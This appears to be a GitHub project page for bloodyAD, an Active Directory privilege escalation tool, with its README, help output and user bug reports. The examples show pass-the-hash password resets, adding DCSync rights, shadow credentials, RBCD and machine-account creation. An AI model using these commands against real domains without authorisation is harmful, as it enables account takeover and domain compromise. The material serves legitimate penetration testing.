BloodyAD is an Active Directory Privilege Escalation Framework

Overview

BloodyAD Framework

BloodyAD is an Active Directory Privilege Escalation Framework, it can be used manually using bloodyAD.py or automatically by combining pathgen.py and autobloody.py.

This framework supports NTLM (with password or NTLM hashes) and Kerberos authentication and binds to LDAP/LDAPS/SAMR services of a domain controller to obtain AD privesc.

It is designed to be used transparently with a SOCKS proxy.

bloodyAD

Description

This tool can perform specific LDAP/SAMR calls to a domain controller in order to perform AD privesc.

Requirements

The following are required:

  • Python 3
  • DSinternals
  • Impacket
  • Ldap3

Usage

Simple usage:

python bloodyAD.py --host 172.16.1.15 -d MYDOM -u myuser -p :70016778cb0524c799ac25b439bd6a31 changePassword mytarget 'Password123!'

List of all available functions:

[bloodyAD]$ python bloodyAD.py -h
usage: bloodyAD.py [-h] [-d DOMAIN] [-u USERNAME] [-p PASSWORD] [-k] [-s {ldap,ldaps,rpc}] [--host HOST] {getGroupMembers,
getObjectAttributes, getObjectSID, addUser, addComputer, delObject, changePassword, addObjectToGroup, addForeignObjectToGroup,
delObjectFromGroup, getObjectsInOu, getOusInOu, getUsersInOu, getComputersInOu, addDomainSync, delDomainSync, addRbcd, delRbcd,
addShadowCredentials, delShadowCredentials, modifyGpoACL, setDontReqPreauthFlag, setAccountDisableFlag}
                          ...

Active Directory Privilege Escalation Framework

Main options:
  -h, --help            show this help message and exit
  -d DOMAIN, --domain DOMAIN
                        Domain used for NTLM authentication
  -u USERNAME, --username USERNAME
                        Username used for NTLM authentication
  -p PASSWORD, --password PASSWORD
                        Cleartext password or LMHASH:NTHASH for NTLM authentication
  -k, --kerberos
  -s {ldap,ldaps,rpc}, --scheme {ldap,ldaps,rpc}
                        Use LDAP over TLS (default is LDAP)
  --host HOST           Hostname or IP of the DC (ex: my.dc.local or 172.16.1.3)

Commands:
  {getGroupMembers, getObjectAttributes, getObjectSID, addUser, addComputer, delObject, changePassword, addObjectToGroup,
  addForeignObjectToGroup, delObjectFromGroup, getObjectsInOu, getOusInOu, getUsersInOu, getComputersInOu, addDomainSync,
  delDomainSync, addRbcd, delRbcd, addShadowCredentials, delShadowCredentials, modifyGpoACL, setDontReqPreauthFlag,
  setAccountDisableFlag}   Function to call

Help text to use a specific function:

[bloodyAD]$ python bloodyAD.py --host 172.16.1.15 -d MYDOM -u myuser -p :70016778cb0524c799ac25b439bd6a31 changePassword -h
usage: 
    Change the target password without knowing the old one using LDAPS or RPC
    Args:
        identity: sAMAccountName, DN, GUID or SID of the target (You must have write permission on it)
        new_pass: new password for the target
    
       [-h] [func_args ...]

positional arguments:
  func_args

optional arguments:
  -h, --help  show this help message and exit

How it works

bloodyAD communicates with a DC using mainly the LDAP protocol in order to get information or add/modify/delete AD objects. A password cannot be updated with LDAP, it must be a secure connection that is LDAPS or SAMR. A DC doesn't have LDAPS activated by default because it must be configured (with a certificate) so SAMR is used in those cases.

autobloody

Description

This tool automate the AD privesc between two AD objects, the source (the one we own) and the target (the one we want) if a privesc path exists. The automation is split in two parts:

  • pathgen.py to find the optimal path for privesc using bloodhound data and neo4j queries.
  • autobloody.py to execute the path found with pathgen.py

Requirements

The following are required:

  • Python 3
  • DSinternals
  • Impacket
  • Ldap3
  • BloodHound
  • Neo4j python driver
  • Neo4j with the GDS library

How to use it

First data must be imported into BloodHound (e.g using SharpHound or BloodHound.py) and Neo4j must be running.

Simple usage:

pathgen.py -dp neo4jPass -ds '[email protected]' -dt '[email protected]' && autobloody.py -d ATTACK -u 'owned_user' -p 'owned_user_pass' --host 172.16.1.15

Full help for pathgen.py:

$ python pathgen.py -h
usage: pathgen.py [-h] [--dburi DBURI] [-du DBUSER] -dp DBPASSWORD -ds DBSOURCE -dt DBTARGET [-f FILEPATH]

Active Directory Privilege Escalation Framework

optional arguments:
  -h, --help            show this help message and exit
  --dburi DBURI         The host neo4j is running on. Default: localhost.
  -du DBUSER, --dbuser DBUSER
                        Neo4j username to use
  -dp DBPASSWORD, --dbpassword DBPASSWORD
                        Neo4j password to use
  -ds DBSOURCE, --dbsource DBSOURCE
                        Label of the source node
  -dt DBTARGET, --dbtarget DBTARGET
                        Label of the target node
  -f FILEPATH, --filepath FILEPATH
                        File path for the graph path file (default is path.json)

Full help for autobloody.py:

$ python autobloody.py -h
usage: autobloody.py [-h] [-d DOMAIN] [-u USERNAME] [-p PASSWORD] [-k] [-s {ldap,ldaps,rpc}] --host HOST [--path PATH]

Active Directory Privilege Escalation Framework

optional arguments:
  -h, --help            show this help message and exit
  -d DOMAIN, --domain DOMAIN
                        Domain used for NTLM authentication
  -u USERNAME, --username USERNAME
                        Username used for NTLM authentication
  -p PASSWORD, --password PASSWORD
                        Cleartext password or LMHASH:NTHASH for NTLM authentication
  -k, --kerberos
  -s {ldap,ldaps,rpc}, --scheme {ldap,ldaps,rpc}
                        Use LDAP over TLS (default is LDAP)
  --host HOST           Hostname or IP of the DC (ex: my.dc.local or 172.16.1.3)
  --path PATH           Path file (to generate with pathgen.py)

How it works

First pathgen.py generates a privesc path using the Dijkstra's algorithm implemented into the Neo4j's GDS library. The Dijkstra's algorithm allows to solve the shortest path problem on a weighted graph. By default the edges created by bloodhound don't have weight but a type (e.g MemberOf, WriteOwner). A weight is then added to each edge accordingly to the type of the edge and the type of the node reached (e.g user,group,domain).

Once a path is generated and stored as a json file, autobloody.py will connect to the DC and execute the path and clean what is reversible (everything except password change).

Comments
  • No certificate outputted when using the command

    No certificate outputted when using the command "setShadowCredentials"

    Hi. Thank you for this tool and all your help!

    According to the help output of the command "setShadowCredentials" not only should shadow credentials be written on a target account but those should then also be used to request a certificate. However, it seems no certificate is outputted. Is this part still to be implemented?

    shadowcreds

    Also, which filter can I use with the command "getObjectAttributes" in order to verify that shadow credentials has indeed been removed? Actually, I have the same question related to disabling the flag "DONT_REQ_PREAUTH".

    opened by jsdhasfedssad 17
  • "setDCSync" fails

    Hi. Me again :) This time I am trying to add DCSync rights to the account "tristan.davies" using the same environment as in my first ticket in which "BIR-ADFS-GMSA$" has GenericAll rights on "tristan.davies".

    It seems the targeted account is successfully identified since its SID is outputted but then something happens. In my test environment "tristan.davies" is a domain admin and thus already has this right if that is the problem?

    dcsync

    opened by jsdhasfedssad 15
  • Bloodhound 4.1 released, new edges added

    Bloodhound 4.1 released, new edges added

    Hi,

    Bloodhound 4.1 was released yesterday. With that came three new edges. "AddKeyCredentialLink", "AddSelf" and "WriteSPN". See the slidedeck for more info.

    You already support "AddKeyCredentialLink" (shadow credentials) but does your tool work when only the edge "AddKeyCredentialLink" and not "GenericWrite" or "GenericAll" is available? The same goes for "WriteSPN". At least you used to be able to write SPNs.

    Will you support the new edges?

    opened by jsdhasfedssad 5
  • Error with pathgen

    Error with pathgen

    First of all, thanks for this amazing project... which seems like a good alternative to aclpwn which has lib issues nowadays.... The error that I am having is when using pathgen.py.

    neo4j.exceptions.ClientError: {code: Neo.ClientError.Procedure.ProcedureNotFound} {message: There is no procedure with the name gds.shortestPath.dijkstra.stream registered for this database instance. Please ensure you've spelled the procedure name correctly and that the procedure is properly deployed.}

    opened by TH3xACE 5
  • Execute addComputer. An error is reported when executing the new version, but the old version can execute normally

    Execute addComputer. An error is reported when executing the new version, but the old version can execute normally

    Hello, I encountered a problem during the local environment test old

    ┌──(root㉿kali)-[/home/laot/桌面/bloodyAD-main]
    └─# python3 bloodyAD.py -d test.lcoal -u 'test' -p 'Pass123' --host 192.168.1.15 addComputer pwnmachine 'CVEPassword1234*'
    Opening domain TEST...
    Successfully added machine account pwnmachine$ with password CVEPassword1234*.
    

    new

    ┌──(root㉿kali)-[/home/laot/桌面/bloodyAD-0.1.8]
    └─# python3 bloodyAD.py -d test.lcoal -u 'test' -p 'Pass123' --host 192.168.1.15 addComputer pwnmachine 'CVEPassword1234*'
    Traceback (most recent call last):
      File "/home/laot/桌面/bloodyAD-0.1.8/bloodyAD.py", line 5, in <module>
        main.main()
      File "/home/laot/桌面/bloodyAD-0.1.8/bloodyAD/main.py", line 71, in main
        args.func(conn, **params)
      File "/home/laot/桌面/bloodyAD-0.1.8/bloodyAD/modules.py", line 157, in addComputer
        ldap_conn.add(computer_dn, attributes=attr)
      File "/usr/lib/python3/dist-packages/ldap3/core/connection.py", line 1013, in add
        response = self.post_send_single_response(self.send('addRequest', request, controls))
      File "/usr/lib/python3/dist-packages/ldap3/strategy/sync.py", line 160, in post_send_single_response
        responses, result = self.get_response(message_id)
      File "/usr/lib/python3/dist-packages/ldap3/strategy/base.py", line 403, in get_response
        raise LDAPOperationResult(result=result['result'], description=result['description'], dn=result['dn'], message=result['message'], response_type=result['type'])
    ldap3.core.exceptions.LDAPConstraintViolationResult: LDAPConstraintViolationResult - 19 - constraintViolation - None - 0000200B: AtrErr: DSID-033E0F1B, #1:
            0: 0000200B: DSID-033E0F1B, problem 1005 (CONSTRAINT_ATT_TYPE), data 0, Att 9026b (dNSHostName)
     - addResponse - None
    
    

    The same test environment, I don't understand why

    opened by zzb1999 4
  • Can't set ShadowCredentials if the target already has one

    Can't set ShadowCredentials if the target already has one

    The first run goes fine, then, re-running it, shows Insuffient Access. immagine

    Then, flushing it and rerunning, goes smooth again: immagine

    Is it possible to add a method to flush the attribute if not empty?

    Cheers!

    opened by GeisericII 4
  • "TypeError: 'NoneType' object is not subscriptable"

    Hi. Thank you for your work! This tool can hopefully fill the void after ACLPwn. I would very much like to try the tool but currently using pathgen.py fails with "TypeError: 'NoneType' object is not subscriptable".

    I am using the standard installation of Bloodhound in Kali (which also includs Neo4j 4.2.1) and they are both running during testing of your tool. AD data is imported. I have also installed all the other requirements your tool requires. When executing the command "python3 pathgen.py -du neo4j -dp [password] -ds '[email protected]' -dt '[email protected]' I get the below stacktrace:

    Traceback (most recent call last): File "/root/pentest/bloodyAD/pathgen.py", line 30, in main() File "/root/pentest/bloodyAD/pathgen.py", line 18, in main path = db.getPrivescPath(args.dbsource, args.dbtarget) File "/root/pentest/bloodyAD/autobloody/database.py", line 11, in getPrivescPath relationships = session.read_transaction(self._findShortestPath, source, target) File "/root/pentest/virtual_env_bloodyad/lib/python3.9/site-packages/neo4j/work/simple.py", line 396, in read_transaction return self._run_transaction(READ_ACCESS, transaction_function, *args, **kwargs) File "/root/pentest/virtual_env_bloodyad/lib/python3.9/site-packages/neo4j/work/simple.py", line 325, in _run_transaction result = transaction_function(tx, *args, **kwargs) File "/root/pentest/bloodyAD/autobloody/database.py", line 64, in _findShortestPath return result.single()[0].relationships TypeError: 'NoneType' object is not subscriptable

    Is there something I do wrong or does the code need updating?

    opened by jsdhasfedssad 4
  • module

    module "setGenericAll" remove permissions does not work

    The "setGenericAll" module with flag "enable" set to "False" does not work for me. After adding the permissions them with the module it is not possible to remove them.

    https://github.com/CravateRouge/bloodyAD/blob/68408821b4f0ab280d7b45e2af621ee5268d4082/bloodyAD/utils.py#L266

    "ace_haspriv" is always "false" here.

    Therefore the remove is never reached. https://github.com/CravateRouge/bloodyAD/blob/68408821b4f0ab280d7b45e2af621ee5268d4082/bloodyAD/utils.py#L282

    Also this path is not taken, if the permissions are added twice. https://github.com/CravateRouge/bloodyAD/blob/68408821b4f0ab280d7b45e2af621ee5268d4082/bloodyAD/utils.py#L272

    opened by trietend 3
  • Reading of LAPS passwords?

    Reading of LAPS passwords?

    Are you planning to implement reading of LAPS passwords? Or can I read that already using the command "getObjectAttributes"? I tried reading the attribute "ms-mcs-AdmPwd" but either you do not collect that or it is not there since I do not have LAPS enabled.

    opened by jsdhasfedssad 3
  • pip install bloodyad error

    pip install bloodyad error

    Hi,

    When I try to install bloodyAD with pip, I get this error, I think it's related to the gssapi module

      error: subprocess-exited-with-error
      
      × Getting requirements to build wheel did not run successfully.
      │ exit code: 1
      ╰─> [21 lines of output]
          /bin/sh: 1: krb5-config: not found
          Traceback (most recent call last):
            File "/usr/local/lib/python3.10/site-packages/pip/_vendor/pep517/in_process/_in_process.py", line 363, in <module>
              main()
            File "/usr/local/lib/python3.10/site-packages/pip/_vendor/pep517/in_process/_in_process.py", line 345, in main
              json_out['return_val'] = hook(**hook_input['kwargs'])
            File "/usr/local/lib/python3.10/site-packages/pip/_vendor/pep517/in_process/_in_process.py", line 130, in get_requires_for_build_wheel
              return hook(config_settings)
            File "/tmp/user/0/pip-build-env-q04orkgu/overlay/lib/python3.10/site-packages/setuptools/build_meta.py", line 338, in get_requires_for_build_wheel
              return self._get_build_requires(config_settings, requirements=['wheel'])
            File "/tmp/user/0/pip-build-env-q04orkgu/overlay/lib/python3.10/site-packages/setuptools/build_meta.py", line 320, in _get_build_requires
              self.run_setup()
            File "/tmp/user/0/pip-build-env-q04orkgu/overlay/lib/python3.10/site-packages/setuptools/build_meta.py", line 335, in run_setup
              exec(code, locals())
            File "<string>", line 109, in <module>
            File "<string>", line 22, in get_output
            File "/usr/lib/python3.10/subprocess.py", line 420, in check_output
              return run(*popenargs, stdout=PIPE, timeout=timeout, check=True,
            File "/usr/lib/python3.10/subprocess.py", line 524, in run
              raise CalledProcessError(retcode, process.args,
          subprocess.CalledProcessError: Command 'krb5-config --libs gssapi' returned non-zero exit status 127.
          [end of output]
      
      note: This error originates from a subprocess, and is likely not a problem with pip.
    error: subprocess-exited-with-error
    
    × Getting requirements to build wheel did not run successfully.
    │ exit code: 1
    ╰─> See above for output.
    

    Any ideas how to fix it ?

    opened by ghost 2
  • RBCD attack without a SPN but using a computer account instead

    RBCD attack without a SPN but using a computer account instead

    I can successfully execute an RBCD attack without involving an existing SPN and instead using a computer account I added just before this using the tool at https://github.com/tothi/rbcd-attack. I tried the same attack using your command "setRbcd" but at the stage when the silver ticket is requested Impacket fails. I didn't actually expect your tool to work since it seems it requires an SPN which I did not input. Still, I wanted to try this before contacting you. I guess this is more of a feature request than a bug report. Can your tool support this attack without needing an SPN? This would lessen the number of requirements needed for this attack to work since anyone can add computers to a domain.

    rbcd1 rbcd2
    opened by jsdhasfedssad 2
Releases(v0.1.7)
Owner
null
Privilege escalation with polkit - CVE-2021-3560

Polkit-exploit - CVE-2021-3560 Privilege escalation with polkit - CVE-2021-3560 Summary CVE-2021-3560 is an authentication bypass on polkit, which all

Ahmad Almorabea 95 Dec 27, 2022
Script to calculate Active Directory Kerberos keys (AES256 and AES128) for an account, using its plaintext password

Script to calculate Active Directory Kerberos keys (AES256 and AES128) for an account, using its plaintext password

Matt Creel 27 Dec 20, 2022
Analyse a forensic target (such as a directory) to find and report files found and not found from CIRCL hashlookup public service

Analyse a forensic target (such as a directory) to find and report files found and not found from CIRCL hashlookup public service. This tool can help a digital forensic investigator to know the context, origin of specific files during a digital forensic investigation.

hashlookup 96 Dec 20, 2022
Directory Traversal in Afterlogic webmail aurora and pro

CVE-2021-26294 Exploit Directory Traversal in Afterlogic webmail aurora and pro . Description: AfterLogic Aurora and WebMail Pro products with 7.7.9 a

Ashish Kunwar 8 Nov 9, 2022
Springboot directory scanning

Springboot directory scanning

WINEZERO 87 Dec 28, 2022
Python directory buster, multiple threads, gobuster-like CLI, web server brute-forcer, URL replace pattern feature.

pybuster v1.1 pybuster is a tool that is used to brute-force URLs of web servers. Features Directory busting (URI) URL replace patterns (put PYBUSTER

Glaukio 1 Jan 5, 2022
Dome - Subdomain Enumeration Tool. Fast and reliable python script that makes active and/or passive scan to obtain subdomains and search for open ports.

DOME - A subdomain enumeration tool Check the Spanish Version Dome is a fast and reliable python script that makes active and/or passive scan to obtai

Vadi 329 Jan 1, 2023
An open-source post-exploitation framework for students, researchers and developers.

Questions? Join the Discord support server Disclaimer: This project should be used for authorized testing or educational purposes only. BYOB is an ope

dvm 8.1k Dec 31, 2022
Script for automatic dump and brute-force passwords using Volatility Framework

Volatility-auto-hashdump Script for automatic dump and brute-force passwords using Volatility Framework

whoamins 11 Apr 11, 2022
Phoenix Framework is an environment for writing, testing and using exploit code.

Phoenix Framework is an environment for writing, testing and using exploit code. ?? Screenshots ?? Community PwnWiki Forums ?? Licen

null 42 Aug 9, 2022
🔍 IRIS: An open-source intelligence framework

IRIS is an open-source OSINT framework, consisting of modules to find information about a target by scraping sites and fetching data from APIs.

IRIS 79 Dec 20, 2022
Extendable payload obfuscation and delivery framework

NSGenCS What Is? An extremely simple, yet extensible framework to evade AV with obfuscated payloads under Windows. Installation Requirements Currently

null 123 Dec 19, 2022
AIL LeakFeeder: A Module for AIL Framework that automate the process to feed leaked files automatically to AIL

AIL LeakFeeder: A Module for AIL Framework that automates the process to feed leaked files automatically to AIL, So basically this feeder will help you ingest AIL with your leaked files automatically.

ail project 8 May 3, 2022
Strapi Framework Vulnerable to Remote Code Execution

CVE-2019-19609 Strapi Framework Vulnerable to Remote Code Execution well, I didnt found any exploit for CVE-2019-19609 so I wrote one. :/ Usage pytho

Dasith Vidanage 7 Mar 8, 2022
🎻 Modularized exploit generation framework

Modularized exploit generation framework for x86_64 binaries Overview This project is still at early stage of development, so you might want to come b

ᴀᴇꜱᴏᴘʜᴏʀ 30 Jan 17, 2022
Phoenix Framework is an environment for writing, testing and using exploit code.

Phoenix-Framework Phoenix Framework is an environment for writing, testing and using exploit code. ?? Screenshots ?? Community PwnWiki Forums ?? Licen

Felix 42 Aug 9, 2022
Flutter Reverse Engineering Framework

This framework helps reverse engineer Flutter apps using patched version of Flutter library which is already compiled and ready for app repacking. There are changes made to snapshot deserialization process that allow you perform dynamic analysis in a convenient way.

PT SWARM 910 Jan 1, 2023
A Modified version of TCC's Osprey poc framework......

fierce-fish fierce-fish是由TCC(斗象能力中心)出品并维护的开源漏洞检测框架osprey的改写,去掉臃肿功能的精简版本poc框架 PS:真的用不惯其它臃肿的功能,不过作为一个收集漏洞poc && exp的框架还是非常不错的!!! osprey For beginners fr

lUc1f3r11 10 Dec 30, 2022